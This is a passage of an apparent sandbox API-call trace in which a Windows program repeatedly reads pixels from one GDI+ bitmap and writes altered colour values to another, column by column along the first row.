(bitmap=0x5d1a9c8, x=55, y=0, color=0x18e3e0) returned 0x0 [0272.883] GdipGetImagePixelFormat (image=0x5d1b670, format=0x18e3d8) returned 0x0 [0272.883] GdipGetImageWidth (image=0x5d1b670, width=0x18e3d8) returned 0x0 [0272.883] GdipGetImageHeight (image=0x5d1b670, height=0x18e3d8) returned 0x0 [0272.884] GdipBitmapSetPixel (bitmap=0x5d1b670, x=55, y=0, color=0x197a8131) returned 0x0 [0272.884] GdipGetImageWidth (image=0x5d1a9c8, width=0x18e3d0) returned 0x0 [0272.884] GdipGetImageHeight (image=0x5d1a9c8, height=0x18e3d0) returned 0x0 [0272.884] GdipBitmapGetPixel (bitmap=0x5d1a9c8, x=56, y=0, color=0x18e3e0) returned 0x0 [0272.884] GdipGetImagePixelFormat (image=0x5d1b670, format=0x18e3d8) returned 0x0 [0272.884] GdipGetImageWidth (image=0x5d1b670, width=0x18e3d8) returned 0x0 [0272.884] GdipGetImageHeight (image=0x5d1b670, height=0x18e3d8) returned 0x0 [0272.884] GdipBitmapSetPixel (bitmap=0x5d1b670, x=56, y=0, color=0xa421f78) returned 0x0 [0272.884] GdipGetImageWidth (image=0x5d1a9c8, width=0x18e3d0) returned 0x0 [0272.884] GdipGetImageHeight (image=0x5d1a9c8, height=0x18e3d0) returned 0x0 [0272.884] GdipBitmapGetPixel (bitmap=0x5d1a9c8, x=57, y=0, color=0x18e3e0) returned 0x0 [0272.884] GdipGetImagePixelFormat (image=0x5d1b670, format=0x18e3d8) returned 0x0 [0272.884] GdipGetImageWidth (image=0x5d1b670, width=0x18e3d8) returned 0x0 [0272.884] GdipGetImageHeight (image=0x5d1b670, height=0x18e3d8) returned 0x0 [0272.884] GdipBitmapSetPixel (bitmap=0x5d1b670, x=57, y=0, color=0x87e68696) returned 0x0 [0272.884] GdipGetImageWidth (image=0x5d1a9c8, width=0x18e3d0) returned 0x0 [0272.884] GdipGetImageHeight (image=0x5d1a9c8, height=0x18e3d0) returned 0x0 [0272.884] GdipBitmapGetPixel (bitmap=0x5d1a9c8, x=58, y=0, color=0x18e3e0) returned 0x0 [0272.884] GdipGetImagePixelFormat (image=0x5d1b670, format=0x18e3d8) returned 0x0 [0272.884] GdipGetImageWidth (image=0x5d1b670, width=0x18e3d8) returned 0x0 [0272.884] GdipGetImageHeight (image=0x5d1b670, height=0x18e3d8) returned 0x0 [0272.885] GdipBitmapSetPixel (bitmap=0x5d1b670, x=58, y=0, color=0x1b81501a) returned 0x0 [0272.885] GdipGetImageWidth (image=0x5d1a9c8, width=0x18e3d0) returned 0x0 [0272.885] GdipGetImageHeight (image=0x5d1a9c8, height=0x18e3d0) returned 0x0 [0272.885] GdipBitmapGetPixel (bitmap=0x5d1a9c8, x=59, y=0, color=0x18e3e0) returned 0x0 [0272.885] GdipGetImagePixelFormat (image=0x5d1b670, format=0x18e3d8) returned 0x0 [0272.885] GdipGetImageWidth (image=0x5d1b670, width=0x18e3d8) returned 0x0 [0272.885] GdipGetImageHeight (image=0x5d1b670, height=0x18e3d8) returned 0x0 [0272.885] GdipBitmapSetPixel (bitmap=0x5d1b670, x=59, y=0, color=0x7e781a5c) returned 0x0 [0272.885] GdipGetImageWidth (image=0x5d1a9c8, width=0x18e3d0) returned 0x0 [0272.885] GdipGetImageHeight (image=0x5d1a9c8, height=0x18e3d0) returned 0x0 [0272.885] GdipBitmapGetPixel (bitmap=0x5d1a9c8, x=60, y=0, color=0x18e3e0) returned 0x0 [0272.885] GdipGetImagePixelFormat (image=0x5d1b670, format=0x18e3d8) returned 0x0 [0272.885] GdipGetImageWidth (image=0x5d1b670, width=0x18e3d8) returned 0x0 [0272.885] GdipGetImageHeight (image=0x5d1b670, height=0x18e3d8) returned 0x0 [0272.885] GdipBitmapSetPixel (bitmap=0x5d1b670, x=60, y=0, color=0x69197805) returned 0x0 [0272.885] GdipGetImageWidth (image=0x5d1a9c8, width=0x18e3d0) returned 0x0 [0272.885] GdipGetImageHeight (image=0x5d1a9c8, height=0x18e3d0) returned 0x0 [0272.885] GdipBitmapGetPixel (bitmap=0x5d1a9c8, x=61, y=0, color=0x18e3e0) returned 0x0 [0272.885] GdipGetImagePixelFormat (image=0x5d1b670, format=0x18e3d8) returned 0x0 [0272.885] GdipGetImageWidth (image=0x5d1b670, width=0x18e3d8) returned 0x0 [0272.885] GdipGetImageHeight (image=0x5d1b670, height=0x18e3d8) returned 0x0 [0272.886] GdipBitmapSetPixel (bitmap=0x5d1b670, x=61, y=0, color=0x1978784d) returned 0x0 [0272.886] GdipGetImageWidth (image=0x5d1a9c8, width=0x18e3d0) returned 0x0 [0272.886] GdipGetImageHeight (image=0x5d1a9c8, height=0x18e3d0) returned 0x0 [0272.886] GdipBitmapGetPixel (bitmap=0x5d1a9c8, x=62, y=0, color=0x18e3e0) returned 0x0 [0272.886] GdipGetImagePixelFormat (image=0x5d1b670, format=0x18e3d8) returned 0x0 [0272.886] GdipGetImageWidth (image=0x5d1b670, width=0x18e3d8) returned 0x0 [0272.886] GdipGetImageHeight (image=0x5d1b670, height=0x18e3d8) returned 0x0 [0272.886] GdipBitmapSetPixel (bitmap=0x5d1b670, x=62, y=0, color=0x74861978) returned 0x0 [0272.886] GdipGetImageWidth (image=0x5d1a9c8, width=0x18e3d0) returned 0x0 [0272.886] GdipGetImageHeight (image=0x5d1a9c8, height=0x18e3d0) returned 0x0 [0272.886] GdipBitmapGetPixel (bitmap=0x5d1a9c8, x=63, y=0, color=0x18e3e0) returned 0x0 [0272.886] GdipGetImagePixelFormat (image=0x5d1b670, format=0x18e3d8) returned 0x0 [0272.886] GdipGetImageWidth (image=0x5d1b670, width=0x18e3d8) returned 0x0 [0272.886] GdipGetImageHeight (image=0x5d1b670, height=0x18e3d8) returned 0x0 [0272.886] GdipBitmapSetPixel (bitmap=0x5d1b670, x=63, y=0, color=0x78197858) returned 0x0 [0272.886] GdipGetImageWidth (image=0x5d1a9c8, width=0x18e3d0) returned 0x0 [0272.886] GdipGetImageHeight (image=0x5d1a9c8, height=0x18e3d0) returned 0x0 [0272.886] GdipBitmapGetPixel (bitmap=0x5d1a9c8, x=64, y=0, color=0x18e3e0) returned 0x0 [0272.886] GdipGetImagePixelFormat (image=0x5d1b670, format=0x18e3d8) returned 0x0 [0272.886] GdipGetImageWidth (image=0x5d1b670, width=0x18e3d8) returned 0x0 [0272.887] GdipGetImageHeight (image=0x5d1b670, height=0x18e3d8) returned 0x0 [0272.887] GdipBitmapSetPixel (bitmap=0x5d1b670, x=64, y=0, color=0x31537819) returned 0x0 [0272.887] GdipGetImageWidth (image=0x5d1a9c8, width=0x18e3d0) returned 0x0 [0272.887] GdipGetImageHeight (image=0x5d1a9c8, height=0x18e3d0) returned 0x0 [0272.887] GdipBitmapGetPixel (bitmap=0x5d1a9c8, x=65, y=0, color=0x18e3e0) returned 0x0 [0272.887] GdipGetImagePixelFormat (image=0x5d1b670, format=0x18e3d8) returned 0x0 [0272.887] GdipGetImageWidth (image=0x5d1b670, width=0x18e3d8) returned 0x0 [0272.887] GdipGetImageHeight (image=0x5d1b670, height=0x18e3d8) returned 0x0 [0272.887] GdipBitmapSetPixel (bitmap=0x5d1b670, x=65, y=0, color=0x177a087c) returned 0x0 [0272.887] GdipGetImageWidth (image=0x5d1a9c8, width=0x18e3d0) returned 0x0 [0272.887] GdipGetImageHeight (image=0x5d1a9c8, height=0x18e3d0) returned 0x0 [0272.887] GdipBitmapGetPixel (bitmap=0x5d1a9c8, x=66, y=0, color=0x18e3e0) returned 0x0 [0272.887] GdipGetImagePixelFormat (image=0x5d1b670, format=0x18e3d8) returned 0x0 [0272.887] GdipGetImageWidth (image=0x5d1b670, width=0x18e3d8) returned 0x0 [0272.887] GdipGetImageHeight (image=0x5d1b670, height=0x18e3d8) returned 0x0 [0272.887] GdipBitmapSetPixel (bitmap=0x5d1b670, x=66, y=0, color=0x781b2840) returned 0x0 [0272.887] GdipGetImageWidth (image=0x5d1a9c8, width=0x18e3d0) returned 0x0 [0272.887] GdipGetImageHeight (image=0x5d1a9c8, height=0x18e3d0) returned 0x0 [0272.887] GdipBitmapGetPixel (bitmap=0x5d1a9c8, x=67, y=0, color=0x18e3e0) returned 0x0 [0272.887] GdipGetImagePixelFormat (image=0x5d1b670, format=0x18e3d8) returned 0x0 [0272.888] GdipGetImageWidth (image=0x5d1b670, width=0x18e3d8) returned 0x0 [0272.888] GdipGetImageHeight (image=0x5d1b670, height=0x18e3d8) returned 0x0 [0272.888] GdipBitmapSetPixel (bitmap=0x5d1b670, x=67, y=0, color=0x197a4276) returned 0x0 [0272.888] GdipGetImageWidth (image=0x5d1a9c8, width=0x18e3d0) returned 0x0 [0272.888] GdipGetImageHeight (image=0x5d1a9c8, height=0x18e3d0) returned 0x0 [0272.888] GdipBitmapGetPixel (bitmap=0x5d1a9c8, x=68, y=0, color=0x18e3e0) returned 0x0 [0272.888] GdipGetImagePixelFormat (image=0x5d1b670, format=0x18e3d8) returned 0x0 [0272.888] GdipGetImageWidth (image=0x5d1b670, width=0x18e3d8) returned 0x0 [0272.888] GdipGetImageHeight (image=0x5d1b670, height=0x18e3d8) returned 0x0 [0272.888] GdipBitmapSetPixel (bitmap=0x5d1b670, x=68, y=0, color=0x7ff41d78) returned 0x0 [0272.888] GdipGetImageWidth (image=0x5d1a9c8, width=0x18e3d0) returned 0x0 [0272.888] GdipGetImageHeight (image=0x5d1a9c8, height=0x18e3d0) returned 0x0 [0272.888] GdipBitmapGetPixel (bitmap=0x5d1a9c8, x=69, y=0, color=0x18e3e0) returned 0x0 [0272.888] GdipGetImagePixelFormat (image=0x5d1b670, format=0x18e3d8) returned 0x0 [0272.888] GdipGetImageWidth (image=0x5d1b670, width=0x18e3d8) returned 0x0 [0272.888] GdipGetImageHeight (image=0x5d1b670, height=0x18e3d8) returned 0x0 [0272.888] GdipBitmapSetPixel (bitmap=0x5d1b670, x=69, y=0, color=0x781aed50) returned 0x0 [0272.888] GdipGetImageWidth (image=0x5d1a9c8, width=0x18e3d0) returned 0x0 [0272.888] GdipGetImageHeight (image=0x5d1a9c8, height=0x18e3d0) returned 0x0 [0272.888] GdipBitmapGetPixel (bitmap=0x5d1a9c8, x=70, y=0, color=0x18e3e0) returned 0x0 [0272.889] GdipGetImagePixelFormat (image=0x5d1b670, format=0x18e3d8) returned 0x0 [0272.889] GdipGetImageWidth (image=0x5d1b670, width=0x18e3d8) returned 0x0 [0272.889] GdipGetImageHeight (image=0x5d1b670, height=0x18e3d8) returned 0x0 [0272.889] GdipBitmapSetPixel (bitmap=0x5d1b670, x=70, y=0, color=0x317e781b) returned 0x0 [0272.889] GdipGetImageWidth (image=0x5d1a9c8, width=0x18e3d0) returned 0x0 [0272.889] GdipGetImageHeight (image=0x5d1a9c8, height=0x18e3d0) returned 0x0 [0272.889] GdipBitmapGetPixel (bitmap=0x5d1a9c8, x=71, y=0, color=0x18e3e0) returned 0x0 [0272.889] GdipGetImagePixelFormat (image=0x5d1b670, format=0x18e3d8) returned 0x0 [0272.889] GdipGetImageWidth (image=0x5d1b670, width=0x18e3d8) returned 0x0 [0272.889] GdipGetImageHeight (image=0x5d1b670, height=0x18e3d8) returned 0x0 [0272.889] GdipBitmapSetPixel (bitmap=0x5d1b670, x=71, y=0, color=0x87824940) returned 0x0 [0272.889] GdipGetImageWidth (image=0x5d1a9c8, width=0x18e3d0) returned 0x0 [0272.889] GdipGetImageHeight (image=0x5d1a9c8, height=0x18e3d0) returned 0x0 [0272.889] GdipBitmapGetPixel (bitmap=0x5d1a9c8, x=72, y=0, color=0x18e3e0) returned 0x0 [0272.889] GdipGetImagePixelFormat (image=0x5d1b670, format=0x18e3d8) returned 0x0 [0272.889] GdipGetImageWidth (image=0x5d1b670, width=0x18e3d8) returned 0x0 [0272.889] GdipGetImageHeight (image=0x5d1b670, height=0x18e3d8) returned 0x0 [0272.889] GdipBitmapSetPixel (bitmap=0x5d1b670, x=72, y=0, color=0x78190b40) returned 0x0 [0272.889] GdipGetImageWidth (image=0x5d1a9c8, width=0x18e3d0) returned 0x0 [0272.890] GdipGetImageHeight (image=0x5d1a9c8, height=0x18e3d0) returned 0x0 [0272.890] GdipBitmapGetPixel (bitmap=0x5d1a9c8, x=73, y=0, color=0x18e3e0) returned 0x0 [0272.890] GdipGetImagePixelFormat (image=0x5d1b670, format=0x18e3d8) returned 0x0 [0272.890] GdipGetImageWidth (image=0x5d1b670, width=0x18e3d8) returned 0x0 [0272.890] GdipGetImageHeight (image=0x5d1b670, height=0x18e3d8) returned 0x0 [0272.890] GdipBitmapSetPixel (bitmap=0x5d1b670, x=73, y=0, color=0x31787819) returned 0x0 [0272.890] GdipGetImageWidth (image=0x5d1a9c8, width=0x18e3d0) returned 0x0 [0272.890] GdipGetImageHeight (image=0x5d1a9c8, height=0x18e3d0) returned 0x0 [0272.890] GdipBitmapGetPixel (bitmap=0x5d1a9c8, x=74, y=0, color=0x18e3e0) returned 0x0 [0272.890] GdipGetImagePixelFormat (image=0x5d1b670, format=0x18e3d8) returned 0x0 [0272.890] GdipGetImageWidth (image=0x5d1b670, width=0x18e3d8) returned 0x0 [0272.890] GdipGetImageHeight (image=0x5d1b670, height=0x18e3d8) returned 0x0 [0272.890] GdipBitmapSetPixel (bitmap=0x5d1b670, x=74, y=0, color=0x78df1978) returned 0x0 [0272.890] GdipGetImageWidth (image=0x5d1a9c8, width=0x18e3d0) returned 0x0 [0272.890] GdipGetImageHeight (image=0x5d1a9c8, height=0x18e3d0) returned 0x0 [0272.890] GdipBitmapGetPixel (bitmap=0x5d1a9c8, x=75, y=0, color=0x18e3e0) returned 0x0 [0272.890] GdipGetImagePixelFormat (image=0x5d1b670, format=0x18e3d8) returned 0x0 [0272.890] GdipGetImageWidth (image=0x5d1b670, width=0x18e3d8) returned 0x0 [0272.890] GdipGetImageHeight (image=0x5d1b670, height=0x18e3d8) returned 0x0 [0272.891] GdipBitmapSetPixel (bitmap=0x5d1b670, x=75, y=0, color=0x878e407b) returned 0x0 [0272.891] GdipGetImageWidth (image=0x5d1a9c8, width=0x18e3d0) returned 0x0 [0272.891] GdipGetImageHeight (image=0x5d1a9c8, height=0x18e3d0) returned 0x0 [0272.891] GdipBitmapGetPixel (bitmap=0x5d1a9c8, x=76, y=0, color=0x18e3e0) returned 0x0 [0272.891] GdipGetImagePixelFormat (image=0x5d1b670, format=0x18e3d8) returned 0x0 [0272.891] GdipGetImageWidth (image=0x5d1b670, width=0x18e3d8) returned 0x0 [0272.891] GdipGetImageHeight (image=0x5d1b670, height=0x18e3d8) returned 0x0 [0272.891] GdipBitmapSetPixel (bitmap=0x5d1b670, x=76, y=0, color=0x206a69e6) returned 0x0 [0272.891] GdipGetImageWidth (image=0x5d1a9c8, width=0x18e3d0) returned 0x0 [0272.891] GdipGetImageHeight (image=0x5d1a9c8, height=0x18e3d0) returned 0x0 [0272.891] GdipBitmapGetPixel (bitmap=0x5d1a9c8, x=77, y=0, color=0x18e3e0) returned 0x0 [0272.891] GdipGetImagePixelFormat (image=0x5d1b670, format=0x18e3d8) returned 0x0 [0272.891] GdipGetImageWidth (image=0x5d1b670, width=0x18e3d8) returned 0x0 [0272.891] GdipGetImageHeight (image=0x5d1b670, height=0x18e3d8) returned 0x0 [0272.891] GdipBitmapSetPixel (bitmap=0x5d1b670, x=77, y=0, color=0x7a5f766e) returned 0x0 [0272.891] GdipGetImageWidth (image=0x5d1a9c8, width=0x18e3d0) returned 0x0 [0272.891] GdipGetImageHeight (image=0x5d1a9c8, height=0x18e3d0) returned 0x0 [0272.891] GdipBitmapGetPixel (bitmap=0x5d1a9c8, x=78, y=0, color=0x18e3e0) returned 0x0 [0272.892] GdipGetImagePixelFormat (image=0x5d1b670, format=0x18e3d8) returned 0x0 [0272.892] GdipGetImageWidth (image=0x5d1b670, width=0x18e3d8) returned 0x0 [0272.892] GdipGetImageHeight (image=0x5d1b670, height=0x18e3d8) returned 0x0 [0272.892] GdipBitmapSetPixel (bitmap=0x5d1b670, x=78, y=0, color=0x78087c78) returned 0x0 [0272.892] GdipGetImageWidth (image=0x5d1a9c8, width=0x18e3d0) returned 0x0 [0272.892] GdipGetImageHeight (image=0x5d1a9c8, height=0x18e3d0) returned 0x0 [0272.892] GdipBitmapGetPixel (bitmap=0x5d1a9c8, x=79, y=0, color=0x18e3e0) returned 0x0 [0272.892] GdipGetImagePixelFormat (image=0x5d1b670, format=0x18e3d8) returned 0x0 [0272.892] GdipGetImageWidth (image=0x5d1b670, width=0x18e3d8) returned 0x0 [0272.892] GdipGetImageHeight (image=0x5d1b670, height=0x18e3d8) returned 0x0 [0272.892] GdipBitmapSetPixel (bitmap=0x5d1b670, x=79, y=0, color=0xe6878706) returned 0x0 [0272.892] GdipGetImageWidth (image=0x5d1a9c8, width=0x18e3d0) returned 0x0 [0272.892] GdipGetImageHeight (image=0x5d1a9c8, height=0x18e3d0) returned 0x0 [0272.892] GdipBitmapGetPixel (bitmap=0x5d1a9c8, x=80, y=0, color=0x18e3e0) returned 0x0 [0272.892] GdipGetImagePixelFormat (image=0x5d1b670, format=0x18e3d8) returned 0x0 [0272.892] GdipGetImageWidth (image=0x5d1b670, width=0x18e3d8) returned 0x0 [0272.892] GdipGetImageHeight (image=0x5d1b670, height=0x18e3d8) returned 0x0 [0272.892] GdipBitmapSetPixel (bitmap=0x5d1b670, x=80, y=0, color=0x7883217e) returned 0x0 [0272.893] GdipGetImageWidth (image=0x5d1a9c8, width=0x18e3d0) returned 0x0 [0272.893] GdipGetImageHeight (image=0x5d1a9c8, height=0x18e3d0) returned 0x0 [0272.893] GdipBitmapGetPixel (bitmap=0x5d1a9c8, x=81, y=0, color=0x18e3e0) returned 0x0 [0272.893] GdipGetImagePixelFormat (image=0x5d1b670, format=0x18e3d8) returned 0x0 [0272.893] GdipGetImageWidth (image=0x5d1b670, width=0x18e3d8) returned 0x0 [0272.893] GdipGetImageHeight (image=0x5d1b670, height=0x18e3d8) returned 0x0 [0272.893] GdipBitmapSetPixel (bitmap=0x5d1b670, x=81, y=0, color=0x781aca50) returned 0x0 [0272.896] GdipGetImageWidth (image=0x5d1a9c8, width=0x18e3d0) returned 0x0 [0272.896] GdipGetImageHeight (image=0x5d1a9c8, height=0x18e3d0) returned 0x0 [0272.896] GdipBitmapGetPixel (bitmap=0x5d1a9c8, x=82, y=0, color=0x18e3e0) returned 0x0 [0272.896] GdipGetImagePixelFormat (image=0x5d1b670, format=0x18e3d8) returned 0x0 [0272.896] GdipGetImageWidth (image=0x5d1b670, width=0x18e3d8) returned 0x0 [0272.896] GdipGetImageHeight (image=0x5d1b670, height=0x18e3d8) returned 0x0 [0272.896] GdipBitmapSetPixel (bitmap=0x5d1b670, x=82, y=0, color=0xe6855521) returned 0x0 [0272.896] GdipGetImageWidth (image=0x5d1a9c8, width=0x18e3d0) returned 0x0 [0272.897] GdipGetImageHeight (image=0x5d1a9c8, height=0x18e3d0) returned 0x0 [0272.897] GdipBitmapGetPixel (bitmap=0x5d1a9c8, x=83, y=0, color=0x18e3e0) returned 0x0 [0272.897] GdipGetImagePixelFormat (image=0x5d1b670, format=0x18e3d8) returned 0x0 [0272.897] GdipGetImageWidth (image=0x5d1b670, width=0x18e3d8) returned 0x0 [0272.897] GdipGetImageHeight (image=0x5d1b670, height=0x18e3d8) returned 0x0 [0272.897] GdipBitmapSetPixel (bitmap=0x5d1b670, x=83, y=0, color=0x787a6c0b) returned 0x0 [0272.897] GdipGetImageWidth (image=0x5d1a9c8, width=0x18e3d0) returned 0x0 [0272.897] GdipGetImageHeight (image=0x5d1a9c8, height=0x18e3d0) returned 0x0 [0272.897] GdipBitmapGetPixel (bitmap=0x5d1a9c8, x=84, y=0, color=0x18e3e0) returned 0x0 [0272.897] GdipGetImagePixelFormat (image=0x5d1b670, format=0x18e3d8) returned 0x0 [0272.897] GdipGetImageWidth (image=0x5d1b670, width=0x18e3d8) returned 0x0 [0272.897] GdipGetImageHeight (image=0x5d1b670, height=0x18e3d8) returned 0x0 [0272.897] GdipBitmapSetPixel (bitmap=0x5d1b670, x=84, y=0, color=0x70247878) returned 0x0 [0272.897] GdipGetImageWidth (image=0x5d1a9c8, width=0x18e3d0) returned 0x0 [0272.897] GdipGetImageHeight (image=0x5d1a9c8, height=0x18e3d0) returned 0x0 [0272.897] GdipBitmapGetPixel (bitmap=0x5d1a9c8, x=85, y=0, color=0x18e3e0) returned 0x0 [0272.897] GdipGetImagePixelFormat (image=0x5d1b670, format=0x18e3d8) returned 0x0 [0272.897] GdipGetImageWidth (image=0x5d1b670, width=0x18e3d8) returned 0x0 [0272.898] GdipGetImageHeight (image=0x5d1b670, height=0x18e3d8) returned 0x0 [0272.898] GdipBitmapSetPixel (bitmap=0x5d1b670, x=85, y=0, color=0xf7e781b) returned 0x0 [0272.898] GdipGetImageWidth (image=0x5d1a9c8, width=0x18e3d0) returned 0x0 [0272.898] GdipGetImageHeight (image=0x5d1a9c8, height=0x18e3d0) returned 0x0 [0272.898] GdipBitmapGetPixel (bitmap=0x5d1a9c8, x=86, y=0, color=0x18e3e0) returned 0x0 [0272.898] GdipGetImagePixelFormat (image=0x5d1b670, format=0x18e3d8) returned 0x0 [0272.898] GdipGetImageWidth (image=0x5d1b670, width=0x18e3d8) returned 0x0 [0272.898] GdipGetImageHeight (image=0x5d1b670, height=0x18e3d8) returned 0x0 [0272.898] GdipBitmapSetPixel (bitmap=0x5d1b670, x=86, y=0, color=0x697e0887) returned 0x0 [0272.898] GdipGetImageWidth (image=0x5d1a9c8, width=0x18e3d0) returned 0x0 [0272.898] GdipGetImageHeight (image=0x5d1a9c8, height=0x18e3d0) returned 0x0 [0272.898] GdipBitmapGetPixel (bitmap=0x5d1a9c8, x=87, y=0, color=0x18e3e0) returned 0x0 [0272.898] GdipGetImagePixelFormat (image=0x5d1b670, format=0x18e3d8) returned 0x0 [0272.898] GdipGetImageWidth (image=0x5d1b670, width=0x18e3d8) returned 0x0 [0272.898] GdipGetImageHeight (image=0x5d1b670, height=0x18e3d8) returned 0x0 [0272.898] GdipBitmapSetPixel (bitmap=0x5d1b670, x=87, y=0, color=0x7f158678) returned 0x0 [0272.898] GdipGetImageWidth (image=0x5d1a9c8, width=0x18e3d0) returned 0x0 [0272.898] GdipGetImageHeight (image=0x5d1a9c8, height=0x18e3d0) returned 0x0 [0272.899] GdipBitmapGetPixel (bitmap=0x5d1a9c8, x=88, y=0, color=0x18e3e0) returned 0x0 [0272.899] GdipGetImagePixelFormat (image=0x5d1b670, format=0x18e3d8) returned 0x0 [0272.899] GdipGetImageWidth (image=0x5d1b670, width=0x18e3d8) returned 0x0 [0272.899] GdipGetImageHeight (image=0x5d1b670, height=0x18e3d8) returned 0x0 [0272.899] GdipBitmapSetPixel (bitmap=0x5d1b670, x=88, y=0, color=0x19794465) returned 0x0 [0272.899] GdipGetImageWidth (image=0x5d1a9c8, width=0x18e3d0) returned 0x0 [0272.899] GdipGetImageHeight (image=0x5d1a9c8, height=0x18e3d0) returned 0x0 [0272.899] GdipBitmapGetPixel (bitmap=0x5d1a9c8, x=89, y=0, color=0x18e3e0) returned 0x0 [0272.899] GdipGetImagePixelFormat (image=0x5d1b670, format=0x18e3d8) returned 0x0 [0272.899] GdipGetImageWidth (image=0x5d1b670, width=0x18e3d8) returned 0x0 [0272.899] GdipGetImageHeight (image=0x5d1b670, height=0x18e3d8) returned 0x0 [0272.899] GdipBitmapSetPixel (bitmap=0x5d1b670, x=89, y=0, color=0x7574e778) returned 0x0 [0272.899] GdipGetImageWidth (image=0x5d1a9c8, width=0x18e3d0) returned 0x0 [0272.899] GdipGetImageHeight (image=0x5d1a9c8, height=0x18e3d0) returned 0x0 [0272.899] GdipBitmapGetPixel (bitmap=0x5d1a9c8, x=90, y=0, color=0x18e3e0) returned 0x0 [0272.899] GdipGetImagePixelFormat (image=0x5d1b670, format=0x18e3d8) returned 0x0 [0272.899] GdipGetImageWidth (image=0x5d1b670, width=0x18e3d8) returned 0x0 [0272.899] GdipGetImageHeight (image=0x5d1b670, height=0x18e3d8) returned 0x0 [0272.900] GdipBitmapSetPixel (bitmap=0x5d1b670, x=90, y=0, color=0x78147686) returned 0x0 [0272.900] GdipGetImageWidth (image=0x5d1a9c8, width=0x18e3d0) returned 0x0 [0272.900] GdipGetImageHeight (image=0x5d1a9c8, height=0x18e3d0) returned 0x0 [0272.900] GdipBitmapGetPixel (bitmap=0x5d1a9c8, x=91, y=0, color=0x18e3e0) returned 0x0 [0272.900] GdipGetImagePixelFormat (image=0x5d1b670, format=0x18e3d8) returned 0x0 [0272.900] GdipGetImageWidth (image=0x5d1b670, width=0x18e3d8) returned 0x0 [0272.900] GdipGetImageHeight (image=0x5d1b670, height=0x18e3d8) returned 0x0 [0272.900] GdipBitmapSetPixel (bitmap=0x5d1b670, x=91, y=0, color=0x1a13500e) returned 0x0 [0272.900] GdipGetImageWidth (image=0x5d1a9c8, width=0x18e3d0) returned 0x0 [0272.900] GdipGetImageHeight (image=0x5d1a9c8, height=0x18e3d0) returned 0x0 [0272.900] GdipBitmapGetPixel (bitmap=0x5d1a9c8, x=92, y=0, color=0x18e3e0) returned 0x0 [0272.900] GdipGetImagePixelFormat (image=0x5d1b670, format=0x18e3d8) returned 0x0 [0272.900] GdipGetImageWidth (image=0x5d1b670, width=0x18e3d8) returned 0x0 [0272.900] GdipGetImageHeight (image=0x5d1b670, height=0x18e3d8) returned 0x0 [0272.900] GdipBitmapSetPixel (bitmap=0x5d1b670, x=92, y=0, color=0x7966767e) returned 0x0 [0272.900] GdipGetImageWidth (image=0x5d1a9c8, width=0x18e3d0) returned 0x0 [0272.900] GdipGetImageHeight (image=0x5d1a9c8, height=0x18e3d0) returned 0x0 [0272.900] GdipBitmapGetPixel (bitmap=0x5d1a9c8, x=93, y=0, color=0x18e3e0) returned 0x0 [0272.901] GdipGetImagePixelFormat (image=0x5d1b670, format=0x18e3d8) returned 0x0 [0272.901] GdipGetImageWidth (image=0x5d1b670, width=0x18e3d8) returned 0x0 [0272.901] GdipGetImageHeight (image=0x5d1b670, height=0x18e3d8) returned 0x0 [0272.901] GdipBitmapSetPixel (bitmap=0x5d1b670, x=93, y=0, color=0x78e68783) returned 0x0 [0272.901] GdipGetImageWidth (image=0x5d1a9c8, width=0x18e3d0) returned 0x0 [0272.901] GdipGetImageHeight (image=0x5d1a9c8, height=0x18e3d0) returned 0x0 [0272.901] GdipBitmapGetPixel (bitmap=0x5d1a9c8, x=94, y=0, color=0x18e3e0) returned 0x0 [0272.901] GdipGetImagePixelFormat (image=0x5d1b670, format=0x18e3d8) returned 0x0 [0272.901] GdipGetImageWidth (image=0x5d1b670, width=0x18e3d8) returned 0x0 [0272.901] GdipGetImageHeight (image=0x5d1b670, height=0x18e3d8) returned 0x0 [0272.901] GdipBitmapSetPixel (bitmap=0x5d1b670, x=94, y=0, color=0x416f323c) returned 0x0 [0272.901] GdipGetImageWidth (image=0x5d1a9c8, width=0x18e3d0) returned 0x0 [0272.901] GdipGetImageHeight (image=0x5d1a9c8, height=0x18e3d0) returned 0x0 [0272.901] GdipBitmapGetPixel (bitmap=0x5d1a9c8, x=95, y=0, color=0x18e3e0) returned 0x0 [0272.901] GdipGetImagePixelFormat (image=0x5d1b670, format=0x18e3d8) returned 0x0 [0272.901] GdipGetImageWidth (image=0x5d1b670, width=0x18e3d8) returned 0x0 [0272.901] GdipGetImageHeight (image=0x5d1b670, height=0x18e3d8) returned 0x0 [0272.901] GdipBitmapSetPixel (bitmap=0x5d1b670, x=95, y=0, color=0x2c200e32) returned 0x0 [0272.901] GdipGetImageWidth (image=0x5d1a9c8, width=0x18e3d0) returned 0x0 [0272.902] GdipGetImageHeight (image=0x5d1a9c8, height=0x18e3d0) returned 0x0 [0272.902] GdipBitmapGetPixel (bitmap=0x5d1a9c8, x=96, y=0, color=0x18e3e0) returned 0x0 [0272.902] GdipGetImagePixelFormat (image=0x5d1b670, format=0x18e3d8) returned 0x0 [0272.902] GdipGetImageWidth (image=0x5d1b670, width=0x18e3d8) returned 0x0 [0272.902] GdipGetImageHeight (image=0x5d1b670, height=0x18e3d8) returned 0x0 [0272.902] GdipBitmapSetPixel (bitmap=0x5d1b670, x=96, y=0, color=0x79571753) returned 0x0 [0272.902] GdipGetImageWidth (image=0x5d1a9c8, width=0x18e3d0) returned 0x0 [0272.902] GdipGetImageHeight (image=0x5d1a9c8, height=0x18e3d0) returned 0x0 [0272.902] GdipBitmapGetPixel (bitmap=0x5d1a9c8, x=97, y=0, color=0x18e3e0) returned 0x0 [0272.902] GdipGetImagePixelFormat (image=0x5d1b670, format=0x18e3d8) returned 0x0 [0272.902] GdipGetImageWidth (image=0x5d1b670, width=0x18e3d8) returned 0x0 [0272.902] GdipGetImageHeight (image=0x5d1b670, height=0x18e3d8) returned 0x0 [0272.902] GdipBitmapSetPixel (bitmap=0x5d1b670, x=97, y=0, color=0x767b7a3b) returned 0x0 [0272.902] GdipGetImageWidth (image=0x5d1a9c8, width=0x18e3d0) returned 0x0 [0272.902] GdipGetImageHeight (image=0x5d1a9c8, height=0x18e3d0) returned 0x0 [0272.902] GdipBitmapGetPixel (bitmap=0x5d1a9c8, x=98, y=0, color=0x18e3e0) returned 0x0 [0272.902] GdipGetImagePixelFormat (image=0x5d1b670, format=0x18e3d8) returned 0x0 [0272.902] GdipGetImageWidth (image=0x5d1b670, width=0x18e3d8) returned 0x0 [0272.902] GdipGetImageHeight (image=0x5d1b670, height=0x18e3d8) returned 0x0 [0272.903] GdipBitmapSetPixel (bitmap=0x5d1b670, x=98, y=0, color=0x78781978) returned 0x0 [0272.903] GdipGetImageWidth (image=0x5d1a9c8, width=0x18e3d0) returned 0x0 [0272.903] 